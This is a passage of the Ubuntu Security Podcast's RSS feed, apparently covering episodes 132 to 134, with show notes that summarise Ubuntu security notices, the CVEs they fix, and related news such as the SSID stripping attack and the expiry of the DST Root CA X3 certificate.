<li><a href="https://ubuntu.com/security/CVE-2021-2162">CVE-2021-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2154">CVE-2021-2154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2146">CVE-2021-2146</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5107-1-firefox-vulnerabilities-06-47">[<a href="https://ubuntu.com/security/notices/USN-5107-1">USN-5107-1</a>] Firefox vulnerabilities [06:47]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38501">CVE-2021-38501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38500">CVE-2021-38500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38499">CVE-2021-38499</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38498">CVE-2021-38498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38497">CVE-2021-38497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38496">CVE-2021-38496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32810">CVE-2021-32810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>93.0 - usual web issues - &ldquo;if a user were tricked into opening a
specially crafted website, an attacker could potentially exploit these to
cause a denial of service, spoof another origin, or execute arbitrary
code.&rdquo;</li>
</ul>
<h3 id="usn-5108-1-libntlm-vulnerability-07-32">[<a href="https://ubuntu.com/security/notices/USN-5108-1">USN-5108-1</a>] libntlm vulnerability [07:32]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17455">CVE-2019-17455</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>stack buffer OOB read when handling a crafted NTLM request since used a
fixed size buffer in various functions - fixed to truncate size to fit
within the buffer if too big to avoid overflowing the buffer</li>
</ul>
<h3 id="usn-5078-3-squashfs-tools-vulnerability-07-54">[<a href="https://ubuntu.com/security/notices/USN-5078-3">USN-5078-3</a>] Squashfs-Tools vulnerability [07:54]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41072">CVE-2021-41072</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Original backport of patch contained an error and so failed to work for
squashfs 2.x filesystems - would fail to actually sort entries as
expected - thanks to Salvatore Bonaccorso from the Debian security team
for bringing this to our attention</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-21-dot-10--impish-indri--released-09-08">Ubuntu 21.10 (Impish Indri) released [09:08]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/ubuntu-21-10-has-landed">https://ubuntu.com/blog/ubuntu-21-10-has-landed</a></li>
<li>5.13 kernel
<ul>
<li>KFENCE memory error detector</li>
<li>Stack offset randomisation across system-calls</li>
<li>Landlock LSM</li>
</ul>
</li>
<li>Disabled unprivileged BPF</li>
<li>GCC 11</li>
</ul>
<h3 id="hiring-13-12">Hiring [13:12]</h3>
<h4 id="security-product-manager">Security Product Manager</h4>
<ul>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E134.mp3" length="11313538" type="audio/mpeg" /><itunes:duration>14:05</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 133
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-133/</link>
          <pubDate>Fri, 01 Oct 2021 15:10:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>b0c58cd2a8f2a393fc778ab4a60801eecd607821a10817c1fe956e4dc1fdc81b795342129b00f136ca88be9605c225cc57ca8988c6d3a97f91b652df3dc26343</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 133</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at a Wifi lookalike attack dubbed "SSID stripping" plus
  updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at a Wifi lookalike attack dubbed "SSID stripping" plus
  updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
  </itunes:summary>
        <description>  This week we look at a Wifi lookalike attack dubbed "SSID stripping" plus
  updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
  </description>
        <googleplay:description>  This week we look at a Wifi lookalike attack dubbed "SSID stripping" plus
  updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at a Wifi lookalike attack dubbed &ldquo;SSID stripping&rdquo; plus
updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>28 unique CVEs addressed</p>
<h3 id="usn-5086-1-linux-kernel-vulnerability-00-50">[<a href="https://ubuntu.com/security/notices/USN-5086-1">USN-5086-1</a>] Linux kernel vulnerability [00:50]</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)</li>
<li>s390x BPF JIT verifier bypass - no CVE assigned</li>
</ul>
<h3 id="usn-5085-1-sql-parse-vulnerability-01-33">[<a href="https://ubuntu.com/security/notices/USN-5085-1">USN-5085-1</a>] SQL parse vulnerability [01:33]</h3>
<ul>
<li>1 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32839">CVE-2021-32839</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS via exponential backtracking with a large amount of
carriage-return, newline combinations</li>
</ul>
<h3 id="usn-5087-1-webkitgtk-vulnerabilities-02-18">[<a href="https://ubuntu.com/security/notices/USN-5087-1">USN-5087-1</a>] WebKitGTK vulnerabilities [02:18]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30858">CVE-2021-30858</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in underlying webkit - originally reported by Apple against their
various operating systems - not actually against webkit directly&hellip;</li>
</ul>
<h3 id="usn-5088-1-edk-ii-vulnerabilities-02-46">[<a href="https://ubuntu.com/security/notices/USN-5088-1">USN-5088-1</a>] EDK II vulnerabilities [02:46]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38575">CVE-2021-38575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3712">CVE-2021-3712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23840">CVE-2021-23840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11098">CVE-2019-11098</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>mix of issues in the embedded openssl in EDK-II plus 2 issues specific to
EDK-II itself - one in the handling of Intel Boot Guard which is designed
to detect attacks against the static root of trust, in particualr
modifification of the initial boot block - an attacker with physical
access to the SPI flash chip, could get code execution after the IBB has
been validated by then injecting SPI transactions to modify the contents
of the IBB in memory</li>
</ul>
<h3 id="usn-5089-1-usn-5089-2-ca-certificates-update-04-34">[<a href="https://ubuntu.com/security/notices/USN-5089-1">USN-5089-1</a>, <a href="https://ubuntu.com/security/notices/USN-5089-2">USN-5089-2</a>] ca-certificates update [04:34]</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)</li>
<li>To also support older devices which don;t have that root cert and when
LetsEncrypt started they got their issuing / intermediate cert (R3)
signed by IdenTrust&rsquo;s &ldquo;DST Root CA X3&rdquo; root certificate -
&ldquo;cross-signature&rdquo;</li>
<li>DST Root CA X3 cert expired yesterday (30th Sept 2021)</li>
<li>So if you only had that then any HTTPS connections to a site using a
LetsEncrypt cert would fail</li>
<li>Also to support various older Android devices which aren&rsquo;t getting any
updates anymore, IdenTrust issued an updated cross-signature expiring in
Sept 2024 so that those Android devices would continue to trust the
issuing cert</li>
<li>Nowadays LetsEncrypt has their own root cert &ldquo;ISRG Root X1&rdquo; - which is
trusted by ca-certificates - this is present on all Ubuntu back to 12.04</li>
<li>But older versions of openssl (1.0.x - xenial, trusty, precise!?!)  and
gnutls etc would see the cross-signature with an expiry in the future and
so return this as a valid chain to validate against - but then when
validating the full chain, it would fail as the DST Root CA X3 cert at
the root is now expired</li>
<li>Would cause connections to fail still</li>
<li>Solution is to blacklist the DST Root CA X3 as this then ensures the
cross-signature is seen as invalid and instead the shorter chain back to
LetsEncrypt&rsquo;s own root cert is used to do the validation</li>
</ul>
<h3 id="usn-5090-1-usn-5090-2-usn-5090-3-usn-5090-4-apache-http-server-vulnerabilities-plus-regression-07-41">[<a href="https://ubuntu.com/security/notices/USN-5090-1">USN-5090-1</a>, <a href="https://ubuntu.com/security/notices/USN-5090-2">USN-5090-2</a>, USN-5090-3, <a href="https://ubuntu.com/security/notices/USN-5090-4">USN-5090-4</a>] Apache HTTP Server vulnerabilities + regression [07:41]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40438">CVE-2021-40438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39275">CVE-2021-39275</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34798">CVE-2021-34798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36160">CVE-2021-36160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33193">CVE-2021-33193</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP/2 specific issue - crafted method would bypass validation and be
forwarded by <code>mod_proxy</code> - so could lead to request splitting / cache
poising</li>
<li>NULL pointer dereference triggerable via crafted request</li>
<li>OOB read in <code>mod_proxy_uwsgi</code> - crash / info leak</li>
<li>OOB write in <code>ap_escape_quotes()</code> if given malicious input - modules in
apache itself don&rsquo;t pass untrusted input to this but other 3rd party
modules might</li>
<li>crafted request to <code>mod_proxy</code> - forward the request to an origin server as
specified in the request - SSRF
<ul>
<li>fix for this resulted in more stricter interpretation of <code>SetHandler</code>
config option for <code>mod_proxy</code> that broke various configurations using
unix sockets - these got interpreted more like URIs and so would be
seen as invalid - broke Plesk and others - upstream then issued further
fixes which we released in a follow-up</li>
</ul>
</li>
</ul>
<h3 id="usn-5091-1-linux-kernel-vulnerabilities-09-44">[<a href="https://ubuntu.com/security/notices/USN-5091-1">USN-5091-1</a>] Linux kernel vulnerabilities [09:44]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37576">CVE-2021-37576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal / bionic hwe)</li>
</ul>
<h3 id="usn-5092-1-usn-5092-2-linux-kernel-vulnerabilities-09-56">[<a href="https://ubuntu.com/security/notices/USN-5092-1">USN-5092-1</a>, <a href="https://ubuntu.com/security/notices/USN-5092-2">USN-5092-2</a>] Linux kernel vulnerabilities [09:56]</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38201">CVE-2021-38201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37576">CVE-2021-37576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41073">CVE-2021-41073</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11 (hirsute, focal hwe)</li>
<li><code>io_uring</code> (5.1) - unprivileged user - trigger free of other kernel
memory - code execution</li>
<li>3 issues in BPF verifier - spectre-like side-channel attacks to leak
kernel memory</li>
<li>KVM guest could corrupt host memory on PowerPC - crash / code exec</li>
</ul>
<h3 id="usn-5094-1-linux-kernel-vulnerabilities-10-39">[<a href="https://ubuntu.com/security/notices/USN-5094-1">USN-5094-1</a>] Linux kernel vulnerabilities [10:39]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37576">CVE-2021-37576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial hwe, trusty azure)</li>
</ul>
<h3 id="usn-5093-1-vim-vulnerabilities-10-57">[<a href="https://ubuntu.com/security/notices/USN-5093-1">USN-5093-1</a>] Vim vulnerabilities [10:57]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3796">CVE-2021-3796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3778">CVE-2021-3778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3770">CVE-2021-3770</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible code-execution through 2 different heap buffer overflows and 1
UAF</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ssid-stripping-attack-against-various-oses-including-ubuntu-11-37">SSID stripping attack against various OSes including Ubuntu [11:37]</h3>
<ul>
<li><a href="https://aireye.tech/2021/09/13/the-ssid-stripping-vulnerability-when-you-dont-see-what-you-get/">https://aireye.tech/2021/09/13/the-ssid-stripping-vulnerability-when-you-dont-see-what-you-get/</a></li>
<li>Combination of lookalike AP name attacks and possible format-string vulns
against Windows, MacOS, iOS, Android and Ubuntu</li>
<li>Lookalike SSIDs uses non-printable chars so that user only sees a chosen
part of the SSID name rather than the entire thing so gets confused</li>
<li>Similar to domain-name lookalike attacks often used in phishing etc - not
really a new problem</li>
<li>No real details on what in Ubuntu is affected (<code>wpa_supplicant</code>,
<code>NetworkManager</code>, <code>gnome-shell</code> etc)</li>
<li>Best remediation would be to try and display all chars in some
representable format to users but then could still get lookalike names
that use these placeholder chars</li>
<li>Hard problem to solve well but given that this doesn&rsquo;t allow to capture
credentials anyway (assuming are using WPA2-PSK since 4-way handshake
makes both the client and AP prove they know the PSK without revealing it
to each other) then is not really much of a risk
<ul>
<li>Only relevant then to unsecured networks but if you are connecting to
an unsecured network then there is no security anyway</li>
</ul>
</li>
</ul>
<h3 id="hiring-15-54">Hiring [15:54]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h4 id="security-product-manager">Security Product Manager</h4>
<ul>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h3 id="1-week-break-for-the-ubuntu-security-podcast">1 week break for the Ubuntu Security Podcast</h3>
<ul>
<li>Back in your feed in 2 weeks in the middle of October</li>
</ul>
<h3 id="farewell-ubuntu-podcast">Farewell Ubuntu Podcast</h3>
<ul>
<li><a href="https://ubuntupodcast.org">https://ubuntupodcast.org</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E133.mp3" length="13970429" type="audio/mpeg" /><itunes:duration>17:58</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 132
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-132/</link>
          <pubDate>Fri, 24 Sep 2021 15:05:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>aecdd8cd6e00592eb78450c30378b1b6a092bce950126ea400aebf107c9f2443264d55fcd2ec1065363edac0522e75e17b8af76f4478df7ddb8bc75fe2ce4f9b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 132</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Extended Security Maintenance gets an extension, Linux disk encryption and
  authentication goes under the microscope and we cover security updates for
  libgcrypt, the Linux kernel, Python, and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Extended Security Maintenance gets an extension, Linux disk encryption and
  authentication goes under the microscope and we cover security updates for
  libgcrypt, the Linux kernel, Python, and more.
  </itunes:summary>
        <description>  Extended Security Maintenance gets an extension, Linux disk encryption and
  authentication goes under the microscope and we cover security updates for
  libgcrypt, the Linux kernel, Python, and more.
  </description>
        <googleplay:description>  Extended Security Maintenance gets an extension, Linux disk encryption and
  authentication goes under the microscope and we cover security updates for
  libgcrypt, the Linux kernel, Python, and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Extended Security Maintenance gets an extension, Linux disk encryption and
authentication goes under the microscope and we cover security updates for
libgcrypt, the Linux kernel, Python, and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>20 unique CVEs addressed</p>
<h3 id="usn-5078-2-squashfs-tools-vulnerabilities-01-02">[<a href="https://ubuntu.com/security/notices/USN-5078-2">USN-5078-2</a>] Squashfs-Tools vulnerabilities [01:02]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41072">CVE-2021-41072</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40153">CVE-2021-40153</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-131/">Episode 131</a></li>
</ul>
<h3 id="usn-5080-1-usn-5080-2-libgcrypt-vulnerabilities-01-43">[<a href="https://ubuntu.com/security/notices/USN-5080-1">USN-5080-1</a>, <a href="https://ubuntu.com/security/notices/USN-5080-2">USN-5080-2</a>] Libgcrypt vulnerabilities [01:43]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40528">CVE-2021-40528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33560">CVE-2021-33560</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Side-channel attacks against the various ElGamal implementations in
OpenPGP - <a href="https://eprint.iacr.org/2021/923">https://eprint.iacr.org/2021/923</a> - researchers from IBM
Research Europe
<ul>
<li>Patent free public key encryption scheme - popular in OpenPGP - 1 in 6
registered OpenPGP keys have an ElGamal subkey</li>
</ul>
</li>
<li>Various implementations of ElGamal are used in different OpenPGP
implementations - Go stdlib, Crypto++ and gcrypt</li>
<li>libgcrypt has previously had other side-channel vulns found and was used
in the development of <a href="https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf">FLUSH+RELOAD attack</a> against GnuPG</li>
<li>This attack exploits the different configurations used in the various
implementations to use timing differences to be able to recover plaintext</li>
<li>Fixed to remove support for smaller key lengths and add exponent blinding
(combining the exponent with randomness to avoid it being inferred by
timing analysis)</li>
</ul>
<h3 id="usn-5071-2-linux-kernel--hwe--vulnerabilities-04-11">[<a href="https://ubuntu.com/security/notices/USN-5071-2">USN-5071-2</a>] Linux kernel (HWE) vulnerabilities [04:11]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36311">CVE-2020-36311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AMD nested virtualisation vulns (<a href="https://ubuntusecuritypodcast.org/episode-130/">Episode 130</a>, <a href="https://ubuntusecuritypodcast.org/episode-131/">Episode 131</a>)</li>
<li>2 other KVM vulns - UAF</li>
<li>OOB write in joystick subsystem via a malicious <code>ioctl()</code>
<ul>
<li>requires a joystick device to be present</li>
<li>snaps joystick interface is not auto-connected by default</li>
</ul>
</li>
</ul>
<h3 id="usn-5071-3-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5071-3">USN-5071-3</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5082-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5082-1">USN-5082-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CAN BCM UAF (<a href="https://ubuntusecuritypodcast.org/episode-121/">Episode 121</a>), AMD nested virtualisation</li>
</ul>
<h3 id="usn-5073-2-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5073-2">USN-5073-2</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5073-3-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5073-3">USN-5073-3</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5079-3-curl-vulnerabilities-06-34">[<a href="https://ubuntu.com/security/notices/USN-5079-3">USN-5079-3</a>] curl vulnerabilities [06:34]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22947">CVE-2021-22947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22946">CVE-2021-22946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22945">CVE-2021-22945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-131/">Episode 131</a></li>
</ul>
<h3 id="usn-5081-1-qt-vulnerabilities-06-49">[<a href="https://ubuntu.com/security/notices/USN-5081-1">USN-5081-1</a>] Qt vulnerabilities [06:49]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38593">CVE-2021-38593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17507">CVE-2020-17507</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in graphics / image handling
<ul>
<li>crafted XBM trigger OOB read -&gt; crash</li>
<li>OOB write when rendering SVG or other crafted vector content</li>
</ul>
</li>
</ul>
<h3 id="usn-5083-1-python-vulnerabilities-07-22">[<a href="https://ubuntu.com/security/notices/USN-5083-1">USN-5083-1</a>] Python vulnerabilities [07:22]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
